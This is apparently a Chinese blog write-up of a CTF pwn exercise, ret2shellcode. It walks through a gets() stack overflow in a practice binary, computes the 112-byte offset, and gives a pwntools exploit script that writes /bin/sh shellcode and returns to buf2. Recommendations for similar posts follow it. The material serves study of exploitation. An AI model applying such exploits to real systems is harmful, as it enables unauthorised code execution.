ret2shellcode

已于 2024-08-23 17:34:36 修改
阅读量638 收藏 14
点赞数 22
文章标签: c语言 linux 汇编
于 2024-08-23 17:33:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sinat_32362411/article/details/141165145
版权

理论基础:

栈空间分布

RE.RE 从零开始的逆向之路(Windows版)
最后一节,Linux libc下存在一点差异,但不影响

环境及工具版本

Ubuntu 20.04
glibc 2.31
Gdb: 9.2
Python: 3.8.10 (default, Jul 29 2024, 17:02:10) [GCC 9.4.0]
Pwndbg: 2024.02.14
Capstone: 5.0.1280
Unicorn: 2.0.1

题面

编译选项如下:
在这里插入图片描述

ida逆向结果如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets((char *)&v4);
  strncpy(buf2, (const char *)&v4, 0x64u);
  printf("bye bye ~");
  return 0;
}

解题步骤:

一句话总结:payload = (shellcode + padding) + *ret

1.找到溢出点

查看代码,通过在main函数中,get函数给v4赋值明显可以产生溢出。RELRO部分开启,我们无法直接通过返回stack地址来ROP,但是后面有把v4 strncpy 到 未初始化的全局变量 buf2 下面

2.构造payload

1)首先确认v4 在栈空间的位置,计算其与ebp+4的差。通过逆向分析可以看到v4在 e s p + 0 x 1 c , esp+0x1c , esp+0x1c, 距离 e b p + 4 ebp+4 ebp+4有 112 个字节 ,这其中包括 shellcode和padding,在后面加上buf2的地址,也就是0x804a080就是完整的payload
在这里插入图片描述
在这里插入图片描述
在python命令行试了一下,i386shellcode的长度是44个字节,需要补充68个字节,当然也可以直接使用ljust补齐
在这里插入图片描述

3.完成exp

关于使用pwntools写exp可以参考pwntools简明手册,简单场景可以直接套用下面的模板


# -*- coding: utf-8 -*-
from pwn import *
context(log_level='debug',arch='i386',os='linux')
io =process('./ret2shellcode')
shellcode =asm(shellcraft.i386.linux.sh())   #使用pwntools生成shellcode
payload = flat([shellcode.ljust(112,b'a'),0x804a080]) #shellcode+padding+ret_address
gdb.attach(io)
io.sendline(payload)
io.interactive()

实验结果:

通过脚本对v4做溢出,使得main函数在ret时eip返回到buf2,但没能功获取到shell

通过vmmap查看,buf2所在的段确实没有执行权限
在这里插入图片描述
查了一下,LinuxKernel5.4以后的版本即时是使用-fno-stackprotect编译的EXEC(不论是在哪个平台编译的,只要运行平台的LinuxKernel版本高于5.4),只有stack会有可执行权限。而在5.4之前,-fno-stackprotect的执行结果实际是会把data ,rodata ,bss,stack这几个段都改成可执行
https://medium.com/csg-govtech/why-doesnt-my-shellcode-work-anymore-136ce179643f

L09ic_70
关注
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 2093
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
有趣的Shellcode和栈
热门推荐
whklhhhh的博客
03-26 3万+
学弟问了一个ctf-wiki上pwn入门题的知识点,本身没什么意思 题目下载链接 - sniperoj-pwn100-shellcode-x86-64 题目简介 很明显栈溢出,buf位于栈顶,栈空间为0x10个字节(可以从buf的位置rsp+0rbp-10h看出),所以栈分布为 内容 偏移 buf rsp last_rbp rsp+0x10 ret_addr rsp+0x...
ret2shellcode 学习
akdelt的博客
01-24 823
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode)注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
Ret2ShellCode
钞sir的博客
01-24 8524
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1018
CTF-wiki的注解:ret2shellcode
【PWN · ret2shellcode | sandbox-bypass | 格式化字符串】[2024CISCN · 华东北赛区]pwn1_
最新发布
Mr_Fmnwon的博客
07-06 912
ret2shellcode,已经不是简单的放到栈上、ret这样一个简单的过程。套一层seccomp的沙箱,打ORW又遇到open受限等等,考虑的蛮多。过程中收获最多的可以说是汇编shellcode手动编写时的一些心得,还是跟着返璞归真师傅的wp做的时候这不会那不会,做完之后写博客,感觉很多都没必要写。。。菜就多练。
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 927
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
[二进制安全学习]ret2shellcode
Y4tacker的博客
07-15 1397
文章目录写在前面ret2shellcode利用原理利用关键例题参考文章 写在前面 懒狗的第二篇学习,开冲 ret2shellcode 利用原理 ret2shellcode,即控制程序执行 shellcode 代码。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。 在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。 利用关键 1、程序存在溢出,并且还要能够控
从零开始做题:逆向 ret2shellcode orw
weixin_44626085的博客
01-28 929
下载orw时防病毒要关闭。
Ret2shellcode利用
looiezheng的专栏
07-17 172
1.用ulimit -c命令确定是否允许产生core文件,若为0,则不生成core文件,需要通过ulimit -c unlimited将其设置为允许产生core文件,该设置仅在当前会话中生效,若要长期有效,需要保存在配置文件中:打开文件/etc/profile 然后在最末尾添加一行 ulimit -c unlimited ,然后保存退出,使用命令 source /etc/profile 使其生效。由于程序直接执行时的环境变量与调试时有差异,会导致栈空间地址变化,注入利用代码后会出现core。
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2277
pwn 入门
好好说话之ret2shellcode
hollk’s blog
06-22 2009
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 596
(仅作为本人的学习笔记和心得 如有错误请多指教)
栈溢出入门(ret2shellcode漏洞)
2301_80718478的博客
07-05 1078
ret2shellcode,即控制程序执行 shellcode代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码,然后通过利用,让程序调到shellcode的地址后去执行这里为了学习shellcode漏洞,龙哥更新了源码:这里是依次获取两个字符串并输出。
栈溢出实例--笔记二(ret2shellcode
一只青木呀
08-01 2417
栈溢出实例--笔记二(ret2shellcode)1、栈溢出含义及栈结构2、ret2shellcode基本思路3、实战一下3.1、二进制程序如下3.2、分析调试查看栈3.3、编写payload获取shell3.4、操作结果 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 2、ret2shellcode基本思路 ret2shellcode需要我们控制程序执行shellcode代码。即ret2shellcode的目标就是在栈上写入布局好的shellcode,利用ret-address返回到
基本ROP之ret2shellcode
至臻求学,胸怀云月
01-12 1729
原理 控制程序执行shellcode代码 shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 一般来说,shellcode需要我们自己进行填充,这其实是一种典型的利用方法。 执行条件: 对应二进制在执行时,shellcode所在区域需要可执行的权限。 过程 下载地址 查看程序保护机制 毫无保护 IDA看下汇编指令 发现gets危险函数 同时还有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值